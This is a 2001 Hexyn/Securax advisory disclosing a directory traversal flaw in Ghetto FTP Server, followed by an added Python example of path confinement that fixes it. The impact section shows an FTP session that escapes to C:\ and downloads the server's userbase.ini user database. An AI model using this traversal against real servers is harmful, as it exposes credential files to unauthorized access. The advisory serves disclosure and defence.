Hexyn / Securax Advisory #16 - Ghetto FTP Server Directory Traversal

Topic:      Ghetto FTP Server Directory Traversal
Announced:  2001-02-17
Affects:    Ghetto FTP Server version 1.0 beta 1

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE
CANNOT ASSURE YOU THAT THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS
SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.

I. Problem Description
**********************
G6 FTP Server is an FTP server for Windows 9x/NT. A bug allows any user to
change to c:\ and its subdirectories, i.e. outside the configured FTP root.

II. Impact
**********
When sending the command "CWD /" (or "cd /" in the default UNIX FTP client),
Ghetto FTP changes to c:\ instead of the FTP root, so any file on the drive
that the server process can read is exposed, including the server's own
user database.

Example:
--------
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /.
ftp> GET /Program Files/CorbaSoft/GFTPS/userbase.ini
local: userbase.ini remote: userbase.ini
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
3048 bytes received in 0.214 secs (14 Kbytes/sec)
ftp> quit
221 Bye.

III. Solution
*************
At this time, no patch is available.

IV. Credits
***********
Bug discovered by t-Omicr0n

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr,
Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH,
zeroX, AreS, tips, Lacrima, GigaByte and everyone at #securax@irc.hexyn.be

--
t-Omicr0n @ http://t-Omicr0n.hexyn.be
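The root cause described above is a CWD handler that hands the client's path straight to the filesystem, so "/" means the drive root. The following is an added example, not code from the advisory or from Ghetto FTP, of how a server should resolve CWD: normalize the client path inside a virtual tree, map it onto a configured root (FTP_ROOT is an assumed value), and refuse anything that still resolves outside that root.

```python
import posixpath
from pathlib import PureWindowsPath

# Constructed for this example: the directory the administrator intends to
# expose. The advisory's bug is that "CWD /" lands in C:\ instead of here.
FTP_ROOT = r"C:\ftproot"


def resolve_virtual_path(cwd: str, requested: str) -> str:
    """Normalize a client path inside the virtual tree rooted at "/".

    Virtual paths are POSIX-style and absolute, so normpath collapses any
    leading ".." run and "/" can never mean anything but the FTP root.
    """
    requested = requested.replace("\\", "/")  # Windows clients send backslashes
    if not requested.startswith("/"):
        requested = posixpath.join(cwd, requested)
    normalized = posixpath.normpath(requested)
    return "/" + normalized.lstrip("/")  # normpath preserves a leading "//"


def to_real_path(root: str, virtual: str) -> str:
    """Map a normalized virtual path onto the filesystem, confined to root."""
    root_p = PureWindowsPath(root)
    parts = [p for p in virtual.split("/") if p]
    for part in parts:
        # Defence in depth: a ".." that survived normalization, or a component
        # such as "D:" that pathlib would treat as a new drive, is rejected.
        if part == ".." or PureWindowsPath(part).anchor:
            raise PermissionError(f"{virtual!r} escapes the FTP root")
    real = root_p.joinpath(*parts)
    if real != root_p and root_p not in real.parents:
        raise PermissionError(f"{virtual!r} escapes the FTP root")
    return str(real)


def handle_cwd(root: str, cwd: str, arg: str) -> tuple[str, str]:
    """Process a CWD command; returns (new virtual cwd, real directory)."""
    virtual = resolve_virtual_path(cwd, arg)
    return virtual, to_real_path(root, virtual)


if __name__ == "__main__":
    # The advisory's session: "cd /" now resolves to the FTP root, not C:\.
    print(handle_cwd(FTP_ROOT, "/pub", "/"))
    print(handle_cwd(FTP_ROOT, "/pub", "..\\..\\..\\Program Files"))
    try:
        handle_cwd(FTP_ROOT, "/", "D:/secrets")
    except PermissionError as exc:
        print("rejected:", exc)
```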